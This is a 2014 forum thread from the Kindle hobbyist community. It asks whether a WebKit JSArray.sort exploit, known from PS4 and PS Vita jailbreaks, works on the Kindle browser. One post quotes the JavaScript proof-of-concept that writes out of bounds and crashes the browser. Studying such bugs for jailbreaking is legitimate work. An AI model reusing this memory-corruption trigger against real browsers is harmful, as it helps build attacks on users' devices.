Old 10-27-2014, 06:44 PM   #1
Funeral_Chris
Junior Member
Funeral_Chris began at the beginning.
 
Posts: 2
Karma: 10
Join Date: Oct 2014
Device: KT2
[KT2] remote code exploit in Basic Kindle 2014 / webkit?

Hey guys, I read about the remote code exploit for the PS4 and PS Vita and, as the Kindle is using WebKit too (and maybe also an old version of it), I decided to test the exploit.

I pressed "Start" and after a couple of seconds the browser crashed with the following (translated error message):


"Software error

The selected application couldn't be started. Please try it again."


Is this a good sign? Maybe for a jailbreak?
Try it yourself, demo: http://wololo.net/v/260.htm

link to the news: http://wololo.net/2014/10/19/vita-ha...ht-be-a-catch/
link to PS4 exploit: http://wololo.net/2014/10/24/webkit-...firmware-1-76/


Edit:
I did some testing. Calling the vulnerable method JSArray.sort is crashing WebKit. IMHO all Kindle versions with WebKit must be affected by that exploit. But how to use it as it is crashing?

Last edited by Funeral_Chris; 10-28-2014 at 04:16 PM. Reason: edit
Old 10-28-2014, 04:33 PM   #2
Funeral_Chris
As of now, we "only" have an exploit which is causing the Kindle browser to crash:

Quote:
<script type="text/javascript">
    var u32 = new Uint32Array(0x100);
    var a1 = [0,1,2,3,u32];
    var a2 = [0,1,2,3,4];
    var a1len = a1.length;
    var a2len = a2.length;
    var u32len = u32.length;

    var myCompFunc = function(x,y)
    {
        if (y == 3 && x == u32) {
            // shift() is called during sort(), which causes the
            // last array item to be written outside the array buffer
            a1.shift();
        }
        return 0;
    };

    a1.sort(myCompFunc);
</script>
Tags
jailbreak, kindle, kt2

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
[KT2] (90C6 - usa) Device knc1 Kindle Developer's Corner 2 10-12-2014 08:34 AM
How-to obtain root access of New Basic Kindle (2014) FW5.6.0.1 hondamarlboro Kindle Developer's Corner 20 10-11-2014 04:36 AM
Kindle 3 Webkit Browser toronado Amazon Kindle 3 09-06-2010 03:08 AM
Kindle 3 Webkit browser doesn't start ylsul Amazon Kindle 8 08-28-2010 07:06 PM
Adobe Acrobat subject to remote exploit Alexander Turcic News 3 09-16-2006 06:29 AM


All times are GMT -4. The time now is 11:56 AM.


MobileRead.com is a privately owned, operated and funded community.